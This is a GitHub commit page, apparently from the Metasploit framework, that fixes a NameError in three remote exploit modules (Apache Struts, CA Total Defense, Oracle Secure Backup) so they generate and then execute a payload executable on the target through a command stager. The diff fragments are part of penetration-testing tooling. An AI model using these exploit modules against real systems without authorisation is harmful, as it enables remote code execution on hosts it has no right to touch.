Skip to content

Commit b8c7161

Browse files
committed
Fix up NameError'd payload_exe
1 parent 59ffe5d commit b8c7161

File tree

3 files changed

+6
-3
lines changed

3 files changed

+6
-3
lines changed

modules/exploits/multi/http/struts_code_exec_exception_delegator.rb

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -10,6 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
1010

1111
include Msf::Exploit::CmdStager
1212
include Msf::Exploit::Remote::HttpClient
13+
include Msf::Exploit::EXE
1314

1415
def initialize(info = {})
1516
super(update_info(info,
@@ -96,7 +97,7 @@ def windows_stager
9697

9798
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
9899
execute_cmdstager({ :temp => '.' })
99-
@payload_exe = payload_exe
100+
@payload_exe = generate_payload_exe
100101

101102
print_status("Attempting to execute the payload...")
102103
execute_command(@payload_exe)

modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -10,6 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
1010

1111
include Msf::Exploit::CmdStager
1212
include Msf::Exploit::Remote::HttpClient
13+
include Msf::Exploit::EXE
1314

1415
def initialize(info = {})
1516
super(update_info(info,
@@ -55,7 +56,7 @@ def initialize(info = {})
5556
def windows_stager
5657
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
5758
execute_cmdstager({ :temp => '.' })
58-
@payload_exe = payload_exe
59+
@payload_exe = generate_payload_exe
5960

6061
print_status("Attempting to execute the payload...")
6162
execute_command(@payload_exe)

modules/exploits/windows/http/osb_uname_jlist.rb

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -10,6 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
1010

1111
include Msf::Exploit::CmdStager
1212
include Msf::Exploit::Remote::HttpClient
13+
include Msf::Exploit::EXE
1314

1415
def initialize(info = {})
1516
super(update_info(info,
@@ -56,7 +57,7 @@ def initialize(info = {})
5657
def windows_stager
5758
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
5859
execute_cmdstager({ :temp => '.' })
59-
@payload_exe = payload_exe
60+
@payload_exe = generate_payload_exe
6061

6162
print_status("Attempting to execute the payload...")
6263
execute_command(@payload_exe)

0 commit comments

Comments
 (0)